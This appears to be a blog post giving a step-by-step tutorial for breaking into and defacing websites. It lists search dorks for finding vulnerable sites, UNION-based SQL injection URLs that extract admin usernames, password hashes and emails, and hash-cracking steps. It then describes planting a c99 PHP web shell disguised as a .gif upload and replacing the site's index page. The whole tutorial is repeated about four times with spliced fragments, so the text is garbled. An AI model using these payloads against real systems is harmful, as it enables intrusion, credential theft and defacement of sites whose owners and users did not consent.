How To H How To Hack website
With SQL Injection :
Full Tutorial
I'm posting this here coz this
tut explains everything step by
step. but most of the sql tuts
ends when we find the
password hash. So newbees
dnt know wat to do after that.
In this tut i'm gonna explain
how to deface a website from
scratch hope you fill find this
usefull....
If you find this tut usefull
please post a comment....
1) FINDING THE TARGET
AND GETTING THE ADMIN
PASSWORD
First we must find our target
website to do that you can use
this "dorks".
I'll give some dorks here copy
anyone of it and paste it in
google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?
decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
you can find lots of dorks
here..(use them without the "
" marks)
Code:
Click Here To Download
1). Check for vulnerability
Let's say that we have some
site like this
http://www.site.com/
news.php?id=5
Now to test if is vulrnable we
add to the end of url ' (quote),
and that would be http://
www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your
SQL syntax; check the manual
that corresponds to your
MySQL server version for the
right etc..."
or something similar
that means is vulrnable to sql
injection
2). Find the number of
columns
To find number of columns we
use statement ORDER BY (tells
database how to order the
result)
so how to use it? Well just
incrementing the number until
we get an error.
http://www.site.com/
news.php?id=5 order by 1/*
<-- no error
http://www.site.com/
news.php?id=5 order by 2/*
<-- no error
http://www.site.com/
news.php?id=5 order by 3/*
<-- no error
http://www.site.com/
news.php?id=5 order by 4/*
<-- error (we get message like
this Unknown column '4' in
'order clause' or something
like that)
that means that the it has 3
columns, cause we got an
error on 4.
3). Check for UNION
function
With union we can select more
data in one sql statement.
so we have
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* (we already
found that number of columns
are 3 in section 2). )
if we see some numbers on
screen, i.e 1 or 2 or 3 then
the UNION works
4). Check for MySQL version
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* NOTE: if /* not
working or you get some
error, then try --
it's a comment and it's
important for our query to
work properly.
let say that we have number 2
on the screen, now to check
for version we replace the
number 2 with @@version or
version() and get someting like
4.1.33-log or 5.0.45 or
similar.
it should look like this
http://www.site.com/
news.php?id=5 union all
select 1,@@version,3/*
if you get an error "union +
illegal mix of collations
(IMPLICIT + COERCIBLE) ..."
i didn't see any paper
covering this problem, so i
must write it
what we need is convert()
function
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,convert(@@version
using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,unhex(hex
(@@version)),3/*
and you will get MySQL
version
5). Getting table and
column name
well if the MySQL version is <
5 (i.e 4.1.33, 4.1.12...) <---
later i will describe for MySQL
> 5 version.
we must guess table and
column name in most cases.
common table names are:
user/s, admin/s, member/s ...
common column names are:
username, user, usr,
user_name, password, pass,
passwd, pwd etc...
i.e would be
http://www.site.com/
news.php?id=5 union all
select 1,2,3 from admin/* (we
see number 2 on the screen
like before, and that's good )
we know that table admin
exists...
now to check column names.
http://www.site.com/
news.php?id=5 union all
select 1,username,3 from
admin/* (if you get an error,
then try the other column
name)
we get username displayed on
screen, example would be
admin, or superadmin etc...
now to check if column
password exists
http://www.site.com/
news.php?id=5 union all
select 1,password,3 from
admin/* (if you get an error,
then try the other column
name)
we seen password on the
screen in hash or plain-text, it
depends of how the database
is set up
i.e md5 hash, mysql hash,
sha1...
now we must complete query
to look nice
for that we can use concat()
function (it joins strings)
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(username,0x3a,password),3
from admin/*
Note that i put 0x3a, its hex
value for : (so 0x3a is hex
value for colon)
(there is another way for that,
char(58), ascii value for : )
http://www.site.com/
news.php?id=5 union all
select 1,concat(username,char
(58),password),3 from admin/
*
now we get dislayed
username:password on screen,
i.e admin:admin or
admin:somehash
when you have this, you can
login like admin or some
superuser
if can't guess the right table
name, you can always try
mysql.user (default)
it has user i password
columns, so example would be
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,password),3 from
mysql.user/*
6). MySQL 5
Like i said before i'm gonna
explain how to get table and
column names
in MySQL > 5.
For this we need
information_schema. It holds
all tables and columns in
database.
to get tables we use
table_name and
information_schema.tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables/*
here we replace the our
number 2 with table_name to
get the first table from
information_schema.tables
displayed on the screen. Now
we must add LIMIT to the end
of query to list out all tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 0,1/*
note that i put 0,1 (get 1
result starting from the 0th)
now to view the second table,
we change limit 0,1 to limit
1,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 1,1/*
the second table is displayed.
for third table we put limit
2,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 2,1/*
keep incrementing until you
get some useful like
db_admin, poll_user, auth,
auth_user etc...
To get the column names the
method is the same.
here we use column_name and
information_schema.columns
the method is same as above
so example would be
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 0,1/*
the first column is diplayed.
the second one (we change
limit 0,1 to limit 1,1)
ie.
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 1,1/*
the second column is
displayed, so keep
incrementing until you get
something like
username,user,login,
password, pass, passwd etc...
if you wanna display column
names for specific table use
this query. (where clause)
let's say that we found table
users.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
where table_name='users'/*
now we get displayed column
name in table users. Just using
LIMIT we can list all columns
in table users.
Note that this won't work if
the magic quotes is ON.
let's say that we found colums
user, pass and email.
now to complete query to put
them all together
for that we use concat() , i
decribe it earlier.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,pass,0x3a,email)
from users/*
what we get here is
user:pass:email from table
users.
example:
admin:hash:whatever@blabla.
com
** if you are too lazy for
doing above stuff you can use
tools they will do all the job:
1) Exploit scanner (this will
find vulnerable websites)
Code:
Click Here To Download
2) SQLi helpper (this tool
will do all the injecting job
and get you the pass or
hash)
Code:
Click Here To Download
*** use the tools only if you
are new to hacking. Do it
manually thats the thrill and
that is real hacking. When you
do it manually you will
understand the concept.
in some websites you can
directly see the password. but
most of the websites encrypt
them using MD5. so u hav to
crack the hash to get the
password. to crack the
password there are three ways
1) check the net whether
this hash is cracked before:
Code:
Click Here To Download
2) crack the password with
the help of a site:
Code:
Click Here To Download
Click Here To Download
3) use a MD5 cracking
software:
Code:
Click Here To Download
Password = OwlsNest
2) DEFACING THE WEBSITE
after getting the password you
can login as the admin of the
site. But first you have to find
the admin login page for the
site. there r three methods to
find the admin panel.
1) you can use an admin
finder website:
Code:
Click Here To Download
2) you can use an admin
finder software:
Code:
Click Here To Download
after logging in as the admin
you can upload photos to the
site. so now you are going to
upload a shell into the site
using this upload facility.
dowload the shell here(shells
are php scripts which affects
websites so it will be detected
as trojans but no need to
worry i take the
responsibility):
Code:
Click Here To Download
extract it you will get a
c99.php upload it.
some sites wont allow you to
upload a php file. so rename
it as c99.php.gif
then upload it.
after that go to http://
www.site.com/images (in most
sites images are saved in this
dir but if you cant find c99
there then you have to guess
the dir)
find the c99.php;.gif and click
it..
now you can see a big control
pannel....
now you can do what ever you
want to do...
search for the index.html file
and replace it with your own
file. so if any one goes to that
site they will see your page....
after doing this click logout....
thats it you are done..
Share ack website
With SQL Injection :
Full Tutorial
I'm posting this here coz this
tut explains everything step by
step. but most of the sql tuts
ends when we find the
password hash. So newbees
dnt know wat to do after that.
In this tut i'm gonna explain
how to deface a website from
scratch hope you fill find this
usefull....
If you find this tut usefull
please post a comment....
1) FINDING THE TARGET
AND GETTING THE ADMIN
PASSWORD
First we must find our target
website to do that you can use
this "dorks".
I'll give some dorks here copy
anyone of it and paste it in
google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?
decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
you can find lots of dorks
here..(use them without the "
" marks)
Code:
Click Here To Download
1). Check for vulnerability
Let's say that we have some
site like this
http://www.site.com/
news.php?id=5
Now to test if is vulrnable we
add to the end of url ' (quote),
and that would be http://
www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your
SQL syntax; check the manual
that corresponds to your
MySQL server version for the
right etc..."
or something similar
that means is vulrnable to sql
injection
2). Find the number of
columns
To find number of columns we
use statement ORDER BY (tells
database how to order the
result)
so how to use it? Well just
incrementing the number until
we get an error.
http://www.site.com/
news.php?id=5 order by 1/*
<-- no error
http://www.site.com/
news.php?id=5 order by 2/*
<-- no error
http://www.site.com/
news.php?id=5 order by 3/*
<-- no error
http://www.site.com/
news.php?id=5 order by 4/*
<-- error (we get message like
this Unknown column '4' in
'order clause' or something
like that)
that means that the it has 3
columns, cause we got an
error on 4.
3). Check for UNION
function
With union we can select more
data in one sql statement.
so we have
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* (we already
found that number of columns
are 3 in section 2). )
if we see some numbers on
screen, i.e 1 or 2 or 3 then
the UNION works
4). Check for MySQL version
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* NOTE: if /* not
working or you get some
error, then try --
it's a comment and it's
important for our query to
work properly.
let say that we have number 2
on the screen, now to check
for version we replace the
number 2 with @@version or
version() and get someting like
4.1.33-log or 5.0.45 or
similar.
it should look like this
http://www.site.com/
news.php?id=5 union all
select 1,@@version,3/*
if you get an error "union +
illegal mix of collations
(IMPLICIT + COERCIBLE) ..."
i didn't see any paper
covering this problem, so i
must write it
what we need is convert()
function
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,convert(@@version
using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,unhex(hex
(@@version)),3/*
and you will get MySQL
version
5). Getting table and
column name
well if the MySQL version is <
5 (i.e 4.1.33, 4.1.12...) <---
later i will describe for MySQL
> 5 version.
we must guess table and
column name in most cases.
common table names are:
user/s, admin/s, member/s ...
common column names are:
username, user, usr,
user_name, password, pass,
passwd, pwd etc...
i.e would be
http://www.site.com/
news.php?id=5 union all
select 1,2,3 from admin/* (we
see number 2 on the screen
like before, and that's good )
we know that table admin
exists...
now to check column names.
http://www.site.com/
news.php?id=5 union all
select 1,username,3 from
admin/* (if you get an error,
then try the other column
name)
we get username displayed on
screen, example would be
admin, or superadmin etc...
now to check if column
password exists
http://www.site.com/
news.php?id=5 union all
select 1,password,3 from
admin/* (if you get an error,
then try the other column
name)
we seen password on the
screen in hash or plain-text, it
depends of how the database
is set up
i.e md5 hash, mysql hash,
sha1...
now we must complete query
to look nice
for that we can use concat()
function (it joins strings)
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(username,0x3a,password),3
from admin/*
Note that i put 0x3a, its hex
value for : (so 0x3a is hex
value for colon)
(there is another way for that,
char(58), ascii value for : )
http://www.site.com/
news.php?id=5 union all
select 1,concat(username,char
(58),password),3 from admin/
*
now we get dislayed
username:password on screen,
i.e admin:admin or
admin:somehash
when you have this, you can
login like admin or some
superuser
if can't guess the right table
name, you can always try
mysql.user (default)
it has user i password
columns, so example would be
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,password),3 from
mysql.user/*
6). MySQL 5
Like i said before i'm gonna
explain how to get table and
column names
in MySQL > 5.
For this we need
information_schema. It holds
all tables and columns in
database.
to get tables we use
table_name and
information_schema.tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables/*
here we replace the our
number 2 with table_name to
get the first table from
information_schema.tables
displayed on the screen. Now
we must add LIMIT to the end
of query to list out all tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 0,1/*
note that i put 0,1 (get 1
result starting from the 0th)
now to view the second table,
we change limit 0,1 to limit
1,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 1,1/*
the second table is displayed.
for third table we put limit
2,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 2,1/*
keep incrementing until you
get some useful like
db_admin, poll_user, auth,
auth_user etc...
To get the column names the
method is the same.
here we use column_name and
information_schema.columns
the method is same as above
so example would be
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 0,1/*
the first column is diplayed.
the second one (we change
limit 0,1 to limit 1,1)
ie.
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 1,1/*
the second column is
displayed, so keep
incrementing until you get
something like
username,user,login,
password, pass, passwd etc...
if you wanna display column
names for specific table use
this query. (where clause)
let's say that we found table
users.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
where table_name='users'/*
now we get displayed column
name in table users. Just using
LIMIT we can list all columns
in table users.
Note that this won't work if
the magic quotes is ON.
let's say that we found colums
user, pass and email.
now to complete query to put
them all together
for that we use concat() , i
decribe it earlier.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,pass,0x3a,email)
from users/*
what we get here is
user:pass:email from table
users.
example:
admin:hash:whatever@blabla.
com
** if you are too lazy for
doing above stuff you can use
tools they will do all the job:
1) Exploit scanner (this will
find vulnerable websites)
Code:
Click Here To Download
2) SQLi helpper (this tool
will do all the injecting job
and get you the pass or
hash)
Code:
Click Here To Download
*** use the tools only if you
are new to hacking. Do it
manually thats the thrill and
that is real hacking. When you
do it manually you will
understand the concept.
in some websites you can
directly see the password. but
most of the websites encrypt
them using MD5. so u hav to
crack the hash to get the
password. to crack the
password there are three ways
1) check the net whether
this hash is cracked before:
Code:
Click Here To Download
2) crack the password with
the help of a site:
Code:
Click Here To Download
Click Here To Download
3) use a MD5 cracking
software:
Code:
Click Here To Download
Password = OwlsNest
2) DEFACING THE WEBSITE
after getting the password you
can login as the admin of the
site. But first you have to find
the admin login page for the
site. there r three methods to
find the admin panel.
1) you can use an admin
finder website:
Code:
Click Here To Download
2) you can use an admin
finder software:
Code:
Click Here To Download
after logging in as the admin
you can upload photos to the
site. so now you are going to
upload a shell into the site
using this upload facility.
dowload the shell here(shells
are php scripts which affects
websites so it will be detected
as trojans but no need to
worry i take the
responsibility):
Code:
Click Here To Download
extract it you will get a
c99.php upload it.
some sites wont allow you to
upload a php file. so rename
it as c99.php.gif
then upload it.
after that go to http://
www.site.com/images (in most
sites images are saved in this
dir but if you cant find c99
there then you have to guess
the dir)
find the c99.php;.gif and click
it..
now you can see a big control
pannel....
now you can do what ever you
want to do...
search for the index.html file
and replace it with your own
file. so if any one goes to that
site they will see your page....
after doing this click logout....
thats it you are done..
With SQL Injection :
Full Tutorial
I'm posting this here coz this
tut explains everything step by
step. but most of the sql tuts
ends when we find the
password hash. So newbees
dnt know wat to do after that.
In this tut i'm gonna explain
how to deface a website from
scratch hope you fill find this
usefull....
If you find this tut usefull
please post a comment....
1) FINDING THE TARGET
AND GETTING THE ADMIN
PASSWORD
First we must find our target
website to do that you can use
this "dorks".
I'll give some dorks here copy
anyone of it and paste it in
google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?
decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
you can find lots of dorks
here..(use them without the "
" marks)
Code:
Click Here To Download
1). Check for vulnerability
Let's say that we have some
site like this
http://www.site.com/
news.php?id=5
Now to test if is vulrnable we
add to the end of url ' (quote),
and that would be http://
www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your
SQL syntax; check the manual
that corresponds to your
MySQL server version for the
right etc..."
or something similar
that means is vulrnable to sql
injection
2). Find the number of
columns
To find number of columns we
use statement ORDER BY (tells
database how to order the
result)
so how to use it? Well just
incrementing the number until
we get an error.
http://www.site.com/
news.php?id=5 order by 1/*
<-- no error
http://www.site.com/
news.php?id=5 order by 2/*
<-- no error
http://www.site.com/
news.php?id=5 order by 3/*
<-- no error
http://www.site.com/
news.php?id=5 order by 4/*
<-- error (we get message like
this Unknown column '4' in
'order clause' or something
like that)
that means that the it has 3
columns, cause we got an
error on 4.
3). Check for UNION
function
With union we can select more
data in one sql statement.
so we have
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* (we already
found that number of columns
are 3 in section 2). )
if we see some numbers on
screen, i.e 1 or 2 or 3 then
the UNION works
4). Check for MySQL version
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* NOTE: if /* not
working or you get some
error, then try --
it's a comment and it's
important for our query to
work properly.
let say that we have number 2
on the screen, now to check
for version we replace the
number 2 with @@version or
version() and get someting like
4.1.33-log or 5.0.45 or
similar.
it should look like this
http://www.site.com/
news.php?id=5 union all
select 1,@@version,3/*
if you get an error "union +
illegal mix of collations
(IMPLICIT + COERCIBLE) ..."
i didn't see any paper
covering this problem, so i
must write it
what we need is convert()
function
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,convert(@@version
using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,unhex(hex
(@@version)),3/*
and you will get MySQL
version
5). Getting table and
column name
well if the MySQL version is <
5 (i.e 4.1.33, 4.1.12...) <---
later i will describe for MySQL
> 5 version.
we must guess table and
column name in most cases.
common table names are:
user/s, admin/s, member/s ...
common column names are:
username, user, usr,
user_name, password, pass,
passwd, pwd etc...
i.e would be
http://www.site.com/
news.php?id=5 union all
select 1,2,3 from admin/* (we
see number 2 on the screen
like before, and that's good )
we know that table admin
exists...
now to check column names.
http://www.site.com/
news.php?id=5 union all
select 1,username,3 from
admin/* (if you get an error,
then try the other column
name)
we get username displayed on
screen, example would be
admin, or superadmin etc...
now to check if column
password exists
http://www.site.com/
news.php?id=5 union all
select 1,password,3 from
admin/* (if you get an error,
then try the other column
name)
we seen password on the
screen in hash or plain-text, it
depends of how the database
is set up
i.e md5 hash, mysql hash,
sha1...
now we must complete query
to look nice
for that we can use concat()
function (it joins strings)
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(username,0x3a,password),3
from admin/*
Note that i put 0x3a, its hex
value for : (so 0x3a is hex
value for colon)
(there is another way for that,
char(58), ascii value for : )
http://www.site.com/
news.php?id=5 union all
select 1,concat(username,char
(58),password),3 from admin/
*
now we get dislayed
username:password on screen,
i.e admin:admin or
admin:somehash
when you have this, you can
login like admin or some
superuser
if can't guess the right table
name, you can always try
mysql.user (default)
it has user i password
columns, so example would be
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,password),3 from
mysql.user/*
6). MySQL 5
Like i said before i'm gonna
explain how to get table and
column names
in MySQL > 5.
For this we need
information_schema. It holds
all tables and columns in
database.
to get tables we use
table_name and
information_schema.tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables/*
here we replace the our
number 2 with table_name to
get the first table from
information_schema.tables
displayed on the screen. Now
we must add LIMIT to the end
of query to list out all tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 0,1/*
note that i put 0,1 (get 1
result starting from the 0th)
now to view the second table,
we change limit 0,1 to limit
1,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 1,1/*
the second table is displayed.
for third table we put limit
2,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 2,1/*
keep incrementing until you
get some useful like
db_admin, poll_user, auth,
auth_user etc...
To get the column names the
method is the same.
here we use column_name and
information_schema.columns
the method is same as above
so example would be
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 0,1/*
the first column is diplayed.
the second one (we change
limit 0,1 to limit 1,1)
ie.
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 1,1/*
the second column is
displayed, so keep
incrementing until you get
something like
username,user,login,
password, pass, passwd etc...
if you wanna display column
names for specific table use
this query. (where clause)
let's say that we found table
users.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
where table_name='users'/*
now we get displayed column
name in table users. Just using
LIMIT we can list all columns
in table users.
Note that this won't work if
the magic quotes is ON.
let's say that we found colums
user, pass and email.
now to complete query to put
them all together
for that we use concat() , i
decribe it earlier.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,pass,0x3a,email)
from users/*
what we get here is
user:pass:email from table
users.
example:
admin:hash:whatever@blabla.
com
** if you are too lazy for
doing above stuff you can use
tools they will do all the job:
1) Exploit scanner (this will
find vulnerable websites)
Code:
Click Here To Download
2) SQLi helpper (this tool
will do all the injecting job
and get you the pass or
hash)
Code:
Click Here To Download
*** use the tools only if you
are new to hacking. Do it
manually thats the thrill and
that is real hacking. When you
do it manually you will
understand the concept.
in some websites you can
directly see the password. but
most of the websites encrypt
them using MD5. so u hav to
crack the hash to get the
password. to crack the
password there are three ways
1) check the net whether
this hash is cracked before:
Code:
Click Here To Download
2) crack the password with
the help of a site:
Code:
Click Here To Download
Click Here To Download
3) use a MD5 cracking
software:
Code:
Click Here To Download
Password = OwlsNest
2) DEFACING THE WEBSITE
after getting the password you
can login as the admin of the
site. But first you have to find
the admin login page for the
site. there r three methods to
find the admin panel.
1) you can use an admin
finder website:
Code:
Click Here To Download
2) you can use an admin
finder software:
Code:
Click Here To Download
after logging in as the admin
you can upload photos to the
site. so now you are going to
upload a shell into the site
using this upload facility.
dowload the shell here(shells
are php scripts which affects
websites so it will be detected
as trojans but no need to
worry i take the
responsibility):
Code:
Click Here To Download
extract it you will get a
c99.php upload it.
some sites wont allow you to
upload a php file. so rename
it as c99.php.gif
then upload it.
after that go to http://
www.site.com/images (in most
sites images are saved in this
dir but if you cant find c99
there then you have to guess
the dir)
find the c99.php;.gif and click
it..
now you can see a big control
pannel....
now you can do what ever you
want to do...
search for the index.html file
and replace it with your own
file. so if any one goes to that
site they will see your page....
after doing this click logout....
thats it you are done..
Share ack website
With SQL Injection :
Full Tutorial
I'm posting this here coz this
tut explains everything step by
step. but most of the sql tuts
ends when we find the
password hash. So newbees
dnt know wat to do after that.
In this tut i'm gonna explain
how to deface a website from
scratch hope you fill find this
usefull....
If you find this tut usefull
please post a comment....
1) FINDING THE TARGET
AND GETTING THE ADMIN
PASSWORD
First we must find our target
website to do that you can use
this "dorks".
I'll give some dorks here copy
anyone of it and paste it in
google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?
decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
you can find lots of dorks
here..(use them without the "
" marks)
Code:
Click Here To Download
1). Check for vulnerability
Let's say that we have some
site like this
http://www.site.com/
news.php?id=5
Now to test if is vulrnable we
add to the end of url ' (quote),
and that would be http://
www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your
SQL syntax; check the manual
that corresponds to your
MySQL server version for the
right etc..."
or something similar
that means is vulrnable to sql
injection
2). Find the number of
columns
To find number of columns we
use statement ORDER BY (tells
database how to order the
result)
so how to use it? Well just
incrementing the number until
we get an error.
http://www.site.com/
news.php?id=5 order by 1/*
<-- no error
http://www.site.com/
news.php?id=5 order by 2/*
<-- no error
http://www.site.com/
news.php?id=5 order by 3/*
<-- no error
http://www.site.com/
news.php?id=5 order by 4/*
<-- error (we get message like
this Unknown column '4' in
'order clause' or something
like that)
that means that the it has 3
columns, cause we got an
error on 4.
3). Check for UNION
function
With union we can select more
data in one sql statement.
so we have
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* (we already
found that number of columns
are 3 in section 2). )
if we see some numbers on
screen, i.e 1 or 2 or 3 then
the UNION works
4). Check for MySQL version
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* NOTE: if /* not
working or you get some
error, then try --
it's a comment and it's
important for our query to
work properly.
let say that we have number 2
on the screen, now to check
for version we replace the
number 2 with @@version or
version() and get someting like
4.1.33-log or 5.0.45 or
similar.
it should look like this
http://www.site.com/
news.php?id=5 union all
select 1,@@version,3/*
if you get an error "union +
illegal mix of collations
(IMPLICIT + COERCIBLE) ..."
i didn't see any paper
covering this problem, so i
must write it
what we need is convert()
function
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,convert(@@version
using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,unhex(hex
(@@version)),3/*
and you will get MySQL
version
5). Getting table and
column name
well if the MySQL version is <
5 (i.e 4.1.33, 4.1.12...) <---
later i will describe for MySQL
> 5 version.
we must guess table and
column name in most cases.
common table names are:
user/s, admin/s, member/s ...
common column names are:
username, user, usr,
user_name, password, pass,
passwd, pwd etc...
i.e would be
http://www.site.com/
news.php?id=5 union all
select 1,2,3 from admin/* (we
see number 2 on the screen
like before, and that's good )
we know that table admin
exists...
now to check column names.
http://www.site.com/
news.php?id=5 union all
select 1,username,3 from
admin/* (if you get an error,
then try the other column
name)
we get username displayed on
screen, example would be
admin, or superadmin etc...
now to check if column
password exists
http://www.site.com/
news.php?id=5 union all
select 1,password,3 from
admin/* (if you get an error,
then try the other column
name)
we seen password on the
screen in hash or plain-text, it
depends of how the database
is set up
i.e md5 hash, mysql hash,
sha1...
now we must complete query
to look nice
for that we can use concat()
function (it joins strings)
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(username,0x3a,password),3
from admin/*
Note that i put 0x3a, its hex
value for : (so 0x3a is hex
value for colon)
(there is another way for that,
char(58), ascii value for : )
http://www.site.com/
news.php?id=5 union all
select 1,concat(username,char
(58),password),3 from admin/
*
now we get dislayed
username:password on screen,
i.e admin:admin or
admin:somehash
when you have this, you can
login like admin or some
superuser
if can't guess the right table
name, you can always try
mysql.user (default)
it has user i password
columns, so example would be
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,password),3 from
mysql.user/*
6). MySQL 5
Like i said before i'm gonna
explain how to get table and
column names
in MySQL > 5.
For this we need
information_schema. It holds
all tables and columns in
database.
to get tables we use
table_name and
information_schema.tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables/*
here we replace the our
number 2 with table_name to
get the first table from
information_schema.tables
displayed on the screen. Now
we must add LIMIT to the end
of query to list out all tables.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 0,1/*
note that i put 0,1 (get 1
result starting from the 0th)
now to view the second table,
we change limit 0,1 to limit
1,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 1,1/*
the second table is displayed.
for third table we put limit
2,1
i.e
http://www.site.com/
news.php?id=5 union all
select 1,table_name,3 from
information_schema.tables
limit 2,1/*
keep incrementing until you
get some useful like
db_admin, poll_user, auth,
auth_user etc...
To get the column names the
method is the same.
here we use column_name and
information_schema.columns
the method is same as above
so example would be
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 0,1/*
the first column is diplayed.
the second one (we change
limit 0,1 to limit 1,1)
ie.
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
limit 1,1/*
the second column is
displayed, so keep
incrementing until you get
something like
username,user,login,
password, pass, passwd etc...
if you wanna display column
names for specific table use
this query. (where clause)
let's say that we found table
users.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,column_name,3 from
information_schema.columns
where table_name='users'/*
now we get displayed column
name in table users. Just using
LIMIT we can list all columns
in table users.
Note that this won't work if
the magic quotes is ON.
let's say that we found colums
user, pass and email.
now to complete query to put
them all together
for that we use concat() , i
decribe it earlier.
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(user,0x3a,pass,0x3a,email)
from users/*
what we get here is
user:pass:email from table
users.
example:
admin:hash:whatever@blabla.
com
** if you are too lazy for
doing above stuff you can use
tools they will do all the job:
1) Exploit scanner (this will
find vulnerable websites)
Code:
Click Here To Download
2) SQLi helpper (this tool
will do all the injecting job
and get you the pass or
hash)
Code:
Click Here To Download
*** use the tools only if you
are new to hacking. Do it
manually thats the thrill and
that is real hacking. When you
do it manually you will
understand the concept.
in some websites you can
directly see the password. but
most of the websites encrypt
them using MD5. so u hav to
crack the hash to get the
password. to crack the
password there are three ways
1) check the net whether
this hash is cracked before:
Code:
Click Here To Download
2) crack the password with
the help of a site:
Code:
Click Here To Download
Click Here To Download
3) use a MD5 cracking
software:
Code:
Click Here To Download
Password = OwlsNest
2) DEFACING THE WEBSITE
after getting the password you
can login as the admin of the
site. But first you have to find
the admin login page for the
site. there r three methods to
find the admin panel.
1) you can use an admin
finder website:
Code:
Click Here To Download
2) you can use an admin
finder software:
Code:
Click Here To Download
after logging in as the admin
you can upload photos to the
site. so now you are going to
upload a shell into the site
using this upload facility.
dowload the shell here(shells
are php scripts which affects
websites so it will be detected
as trojans but no need to
worry i take the
responsibility):
Code:
Click Here To Download
extract it you will get a
c99.php upload it.
some sites wont allow you to
upload a php file. so rename
it as c99.php.gif
then upload it.
after that go to http://
www.site.com/images (in most
sites images are saved in this
dir but if you cant find c99
there then you have to guess
the dir)
find the c99.php;.gif and click
it..
now you can see a big control
pannel....
now you can do what ever you
want to do...
search for the index.html file
and replace it with your own
file. so if any one goes to that
site they will see your page....
after doing this click logout....
thats it you are done..
No comments:
Post a Comment